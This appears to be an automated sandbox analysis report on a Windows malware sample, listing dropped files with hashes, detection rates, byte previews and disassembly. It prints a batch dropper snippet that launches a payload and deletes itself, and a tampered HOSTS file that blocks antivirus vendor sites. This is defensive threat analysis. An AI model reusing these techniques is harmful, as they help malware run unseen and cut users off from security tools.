                                                      SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mVcL1bG2wOpbRnAdASBktKcKZG1t+kiE2J5xAIWPUV:hCRLuVFOOr+DEqBbOGVAdASKOZG1wknS
                                                      MD5:44ED471A88CA3E3E404EE06B3FED43F4
                                                      SHA1:BDC6A8090B3F507481B40A177B9BE34E98077927
                                                      SHA-256:891F19BF4B1FEF90065D1FB1B21502EEC493BBDE5C64492E559B49223F5E4263
                                                      SHA-512:DCBE726E189F268DD1D180A47252EC66AB8B00FE8036D9EDAB1622305150B04917B549AFBA3701197A13E416C71C556A7635824028C7F3D5C471349FB695B27B
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\sB1sK52ORC.bat"
                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):32256
                                                      Entropy (8bit):5.631194486392901
                                                      Encrypted:false
                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      • Antivirus: Virustotal, Detection: 25%
                                                      Joe Sandbox View:
                                                      • Filename: hfGA6tjyxY.exe, Detection: malicious
                                                      • Filename: 3m7cmtctck.exe, Detection: malicious
                                                      • Filename: jXtV6KO1A7.exe, Detection: malicious
                                                      • Filename: fDTPlvsGfH.exe, Detection: malicious
                                                      • Filename: W4tW72sfAD.exe, Detection: malicious
                                                      • Filename: 8CDSiIApNr.exe, Detection: malicious
                                                      • Filename: 3otr19d5Oq.exe, Detection: malicious
                                                      • Filename: idYLOQOVSi.exe, Detection: malicious
                                                      • Filename: ZAF4Dsu737.exe, Detection: malicious
                                                      • Filename: mbsPX9l9Ge.exe, Detection: malicious
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):85504
                                                      Entropy (8bit):5.8769270258874755
                                                      Encrypted:false
                                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 67%
                                                      • Antivirus: Virustotal, Detection: 69%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):69632
                                                      Entropy (8bit):5.932541123129161
                                                      Encrypted:false
                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                      • Antivirus: Virustotal, Detection: 20%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):85504
                                                      Entropy (8bit):5.8769270258874755
                                                      Encrypted:false
                                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 67%
                                                      • Antivirus: Virustotal, Detection: 69%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):33792
                                                      Entropy (8bit):5.541771649974822
                                                      Encrypted:false
                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                      • Antivirus: Virustotal, Detection: 4%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):33792
                                                      Entropy (8bit):5.541771649974822
                                                      Encrypted:false
                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                      • Antivirus: Virustotal, Detection: 4%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):32256
                                                      Entropy (8bit):5.631194486392901
                                                      Encrypted:false
                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      • Antivirus: Virustotal, Detection: 25%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):24064
                                                      Entropy (8bit):5.4346552043530165
                                                      Encrypted:false
                                                      SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                      MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                      SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                      SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                      SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 6%
                                                      • Antivirus: Virustotal, Detection: 11%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):24064
                                                      Entropy (8bit):5.4346552043530165
                                                      Encrypted:false
                                                      SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                      MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                      SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                      SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                      SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 6%
                                                      • Antivirus: Virustotal, Detection: 11%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):69632
                                                      Entropy (8bit):5.932541123129161
                                                      Encrypted:false
                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                      • Antivirus: Virustotal, Detection: 20%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1968128
                                                      Entropy (8bit):7.554175262094728
                                                      Encrypted:false
                                                      SSDEEP:24576:wR5wlxvspUb0qtT2YSCeBJxs56NAFUhOcfMxHoktN/c61+bURfTj/PlzBCpEwxl5:wUPKCeJxkBceok7WURfTj/j9wDmm
                                                      MD5:3997D7D058AF3C1B6C9ABB57F6FA1F2A
                                                      SHA1:CD38C3EB67E2D09445EB39B66A69B31673C2360C
                                                      SHA-256:B19C5E3261D05C95756D6452048448C4AB30D3179F90CA714DE39ECE0CD72D99
                                                      SHA-512:AD53432C8F8309701E0DC2BA7C885F5088EE69C3073E9D1DE4A3C75CB3C1AF845B43D0A8512AF58BCD425A831EC4F4BCF74FE3918956527DB5A96A88FC003A36
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                      • Antivirus: Virustotal, Detection: 74%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ... ....@.. .......................`............@.....................................K.... ..p....................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...p.... ......................@....reloc.......@......................@..B........................H...........<.......s......p@..I........................................0..........(.... ........8........E....N...*...).......8I...(.... ....~u...{|...:....& ....8....*(.... ....~u...{....:....& ....8....(.... ....8........0.......... ........8........E............S...........8)...~....:.... ....~u...{....9....& ....8.......... ....~u...{....:....& ....8....~....(H... .... .... ....s....~....(L....... ....8^...r...ps....z*....~....(P...~....(T... ....?.... ....8&.....(....*
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:ASCII text, with very long lines (334), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):334
                                                      Entropy (8bit):5.8140695358491365
                                                      Encrypted:false
                                                      SSDEEP:6:b3aOblTT6pS5r7+dUExanl5SfPV4WD2ES5JVgOMT16wslU5XlXJ:TaiJHGPxanlYwgOw6M5v
                                                      MD5:52111B51DEC339C6A76B6C866EEC54ED
                                                      SHA1:37A6D21D02CB10DDEB0D8EECF0CDB7B412263BE8
                                                      SHA-256:3CC1B3F788ABA7C13DEB30F164133F585498EC50AE18A26AF48AEC0182ADA352
                                                      SHA-512:4FB2ACDBD8B827B010FB9FCF330DE19823AF7F3CC6B374FEE08DE4F3A0D72518CE91F77EEB1B0E27291C75340E1880E377ED1A95D5A1EAE6EF9490460F635E63
                                                      Malicious:false
                                                      Preview:TsAPDlRCH829PBrCIyyjxftvXtlqsbi9TUILncPCgeA5CICUTxSw15gx9O1UAkUqZ3p43fYqjwDTextPqQX4JwHXyVMZk4C5KUfJcIbyZlNF2NTLfmotNZgnvSGiT8FotHJJRjwhzifhjCfkCA48QTsvx2XKC3fbgjVuEJ450G3o39EtxffSDHXaZXVZLme6DDAAqug2G8HKZD1yxoWhXMXZL5UqxeuOl7lz8ECC8nLF9NAWghlgP7i0qlyuazFlO3iccB0tlTiuASZ848JP3N8oYuJWQRmIhj1Goi3fr156YyzYMz0cqzsA44Ds2ddTqZMbbSUWEoiBSB
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1968128
                                                      Entropy (8bit):7.554175262094728
                                                      Encrypted:false
                                                      SSDEEP:24576:wR5wlxvspUb0qtT2YSCeBJxs56NAFUhOcfMxHoktN/c61+bURfTj/PlzBCpEwxl5:wUPKCeJxkBceok7WURfTj/j9wDmm
                                                      MD5:3997D7D058AF3C1B6C9ABB57F6FA1F2A
                                                      SHA1:CD38C3EB67E2D09445EB39B66A69B31673C2360C
                                                      SHA-256:B19C5E3261D05C95756D6452048448C4AB30D3179F90CA714DE39ECE0CD72D99
                                                      SHA-512:AD53432C8F8309701E0DC2BA7C885F5088EE69C3073E9D1DE4A3C75CB3C1AF845B43D0A8512AF58BCD425A831EC4F4BCF74FE3918956527DB5A96A88FC003A36
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                      • Antivirus: Virustotal, Detection: 74%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ... ....@.. .......................`............@.....................................K.... ..p....................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...p.... ......................@....reloc.......@......................@..B........................H...........<.......s......p@..I........................................0..........(.... ........8........E....N...*...).......8I...(.... ....~u...{|...:....& ....8....*(.... ....~u...{....:....& ....8....(.... ....8........0.......... ........8........E............S...........8)...~....:.... ....~u...{....9....& ....8.......... ....~u...{....:....& ....8....~....(H... .... .... ....s....~....(L....... ....8^...r...ps....z*....~....(P...~....(T... ....?.... ....8&.....(....*
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):141
                                                      Entropy (8bit):5.61179703406828
                                                      Encrypted:false
                                                      SSDEEP:3:5YW5uzdNgRxPGid1bOFWqPTxxKIcYLitBMtG+B6dr7zXsSrl3fSs:5YWwgXPGivbOF/lxKOvBB67zcYlvSs
                                                      MD5:5622E54B9BD142AC3E2AE55196C4AB89
                                                      SHA1:74D044F079CFD00840F92F61436916B5B53F97C8
                                                      SHA-256:03C12437E85E88EED0820FA7636842EC900FEA8D1D576CE8703F7C6D24F4CE4B
                                                      SHA-512:C70F2F00D9CF129E4DD6521EF229AC2B575AD25AF89781206FB68BFE488E40AE84764FB643431C959DD63606587E441359EBA7C8F047D4BCB878E24AA87C3C9B
                                                      Malicious:false
                                                      Preview:D54KwNs2UYKBYG8YpXqIR0tBz3KXSjegQTjcuYvrM8zZ4fETGf7ONZ1NL3V2DUjv4ouFhgnRm95SBUGUy1RxlPS1cVQ1D2o2YDfQu9wj2qlNdiM1xADMDwJoV2mLPwNuUD37y0kzEr45n
                                                      Process:C:\Users\user\AppData\Local\Temp\GargantuanS.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1132
                                                      Entropy (8bit):4.645108565915121
                                                      Encrypted:false
                                                      SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTtozIRdG:vDZhyoZWM9rU5fFc9OM
                                                      MD5:4B81122BEC5C7F1650C47159338C9BA3
                                                      SHA1:EA50B1416C0288E27CA41390D7A2DD85D099DD50
                                                      SHA-256:D919FD0377FBCB23402D089C48BA3132B6115F7E1E57E0588ABFBAF1562A170D
                                                      SHA-512:EC5DB50EA5F510DB22A87B7FC768AEB5E36389E5C7F74DA91207BEDFE940EB9FEC506907BF51A5800EA94B4F2B37513298F57F598EEFD7504DFE4C1C54A5CB14
                                                      Malicious:true
                                                      Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 www.360totalsecurity.com..0.0.0.0 www.ccleaner.com..0.0.0.0 malwarebytes.sooftware.com..0.0.0.0 www.malwarebytes.com..0.0.0.0 www.micros
                                                      Process:C:\Windows\System32\PING.EXE
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):502
                                                      Entropy (8bit):4.630609828667227
                                                      Encrypted:false
                                                      SSDEEP:12:P9l5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:VfdUOAokItULVDv
                                                      MD5:01E42C7D0BFC330C8CB8F87BD1F25257
                                                      SHA1:EAD7E45750E84C22F8BB01AF7D3BF6CB81401F8F
                                                      SHA-256:A634384A405C46CD9DB3F596A3F5A032AC51B1B7634BC8FFB9D016CDBCF74CD4
                                                      SHA-512:61F024BC83B791B9A7396F4BF85F38E77E07ADFD7ECC07EE799E8A070533064FC5FB552DDFD41A3DF07E92D41D37585EA962FEF98DAB9CBD1CC4C84812CAC64A
                                                      Malicious:false
                                                      Preview:..Pinging 965543 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Entropy (8bit):7.917799688345123
                                                      TrID:
                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                      • DOS Executable Generic (2002/1) 0.92%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe
                                                      File size:6'701'051 bytes
                                                      MD5:6acbb1fb58dccd74db667187b22de689
                                                      SHA1:cf0df5b247b15157cfce47473d1b063705d10b44
                                                      SHA256:c792057cb761da8872421a6c906c4481b260bdb5d27b86378efdd2af39319687
                                                      SHA512:b195df77aece1c054493a8fa195b9cffbfb9b2fe5c446ce59aa16fcc7ca0d19ca1ae25d7de4aa9fde59cdcd554293057a1d6806c0734d3d9e62671088d5a66a6
                                                      SSDEEP:196608:5EnAjdZqS8NA40yYnSTq0GnUZhUjGtpoHtx:DbHB40yYSTq+Rix
                                                      TLSH:2D662256E2980CE5E87293BC8963CD79A2737E982A71C68E12F47C37BF732D15C25241
                                                      File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........B#..,p..,p..,p.:.p..,p.:.p5.,p.:.p..,p<..p..,p<.(q..,p<./q..,p<.)q..,p...p..,p...p..,p...p..,p..-p..,p2.)q..,p2.,q..,p2..p..,
                                                      Icon Hash:0f07132b6d35171c
                                                      Entrypoint:0x140026670
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x140000000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x65BA8FE6 [Wed Jan 31 18:22:30 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:2
                                                      File Version Major:5
                                                      File Version Minor:2
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:2
                                                      Import Hash:e8a30656287fe831c9782204ed10cd68
                                                      Instruction
                                                      dec eax
                                                      sub esp, 28h
                                                      call 00007FA13556DFF8h
                                                      dec eax
                                                      add esp, 28h
                                                      jmp 00007FA13556D98Fh
                                                      int3
                                                      int3
                                                      dec eax
                                                      mov eax, esp
                                                      dec eax
                                                      mov dword ptr [eax+08h], ebx
                                                      dec eax
                                                      mov dword ptr [eax+10h], ebp
                                                      dec eax
                                                      mov dword ptr [eax+18h], esi
                                                      dec eax
                                                      mov dword ptr [eax+20h], edi
                                                      inc ecx
                                                      push esi
                                                      dec eax
                                                      sub esp, 20h
                                                      dec ebp
                                                      mov edx, dword ptr [ecx+38h]
                                                      dec eax
                                                      mov esi, edx
                                                      dec ebp
                                                      mov esi, eax
                                                      dec eax
                                                      mov ebp, ecx
                                                      dec ecx
                                                      mov edx, ecx
                                                      dec eax
                                                      mov ecx, esi
                                                      dec ecx
                                                      mov edi, ecx
                                                      inc ecx
                                                      mov ebx, dword ptr [edx]
                                                      dec eax
